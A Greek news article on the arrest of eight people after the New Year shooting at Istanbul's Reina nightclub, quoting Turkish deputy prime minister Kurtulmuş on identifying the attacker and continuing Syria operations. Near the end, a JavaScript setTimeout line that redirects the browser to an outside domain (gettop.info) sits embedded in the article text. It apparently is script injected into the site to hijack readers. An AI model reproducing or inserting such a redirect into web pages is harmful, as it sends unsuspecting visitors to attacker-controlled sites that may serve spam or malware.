Κουρτουλμούς: Είμαστε κοντά να ταυτοποιήσουμε τον μακελάρη-Νέες φωτογραφίες του δράστη

0
13

 

Τη σύλληψη οχτώ ατόμων για το τρομοκρατικό χτύπημα σε νυχτερινό κέντρο της Κωνσταντινούπολης, την πρωτοχρονιά, επιβεβαίωσε ο αντιπρόεδρος της τουρκικής κυβέρνησης, Νούμαν Κουρτουλμούς ενώ διαμηνύει πως οι στρατιωτικές επιχειρήσεις στη βόρεια Συρία θα συνεχιστούν έως ότου εξαλειφθεί κάθε απειλή για την Τουρκία.

Όπως δήλωσε κατά τη διάρκεια συνέντευξης Τύπου οι Aρχές είναι πολύ κοντά στο να ταυτοποιήσουν τον δράστη της επίθεσης.
turkey-1

turkey

«Βρέθηκαν πληροφορίες για τα αποτυπώματα και το παρουσιαστικό του τρομοκράτη» ανέφερε σημειώνοντας ότι η επίθεση του Σαββάτου παρουσιάζει «σημαντικές διαφορές» από άλλες που έχουν γίνει πρόσφατα στην Τουρκία. Ο στόχος, υποστήριξε, ήταν να διχαστεί η τουρκική κοινωνία.

Παράλληλα διαμήνυσε ότι η Τουρκία είναι αποφασισμένη να συνεχίσει τη στρατιωτική επιχείρηση εναντίον της τρομοκρατίας στη βόρεια Συρία.
Η επίθεση που στοίχισε τη ζωή σε 39 ανθρώπους «είναι ένα μήνυμα που απευθύνεται στις εξωτερικές επιχειρήσεις, αρχίζοντας από την επιχείρηση Ασπίδα του Ευφράτη», η οποία στρέφεται εναντίον των τζιχαντιστών και των Κούρδων πολιτοφυλάκων της Συρίας, είπε ο Κουρτουλμούς.

Είναι σαφές, πρόσθεσε, ότι η επιχείρηση αυτή, που ξεκίνησε τον Αύγουστο, έχει ενοχλήσει τις τρομοκρατικές οργανώσεις και όσους κρύβονται πίσω από αυτές.
«Θα συνεχίσουμε να διεξάγουμε τις εξωτερικές επιχειρήσεις μας με αποφασιστικότητα» υπογράμμισε.

Νωρίτερα το πρακτορείο ειδήσεων Dogan μετέδωσε ότι οκτώ άτομα έχουν τεθεί υπό κράτηση από τις τουρκικές Αρχές, στο πλαίσιο της έρευνας για την επίθεση εναντίον του κλαμπ Reina στον Βόσπορο.
Καμιά λεπτομέρεια δεν έγινε γνωστή σχετικά με τα πρόσωπα τα οποία συνελήφθησαν από ομάδες της αντιτρομοκρατικής αστυνομίας.

Το Ισλαμικό Κράτος έχει ήδη αναλάβει την ευθύνη για την επίθεση που προκάλεσε τον θάνατο 39 ανθρώπων. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here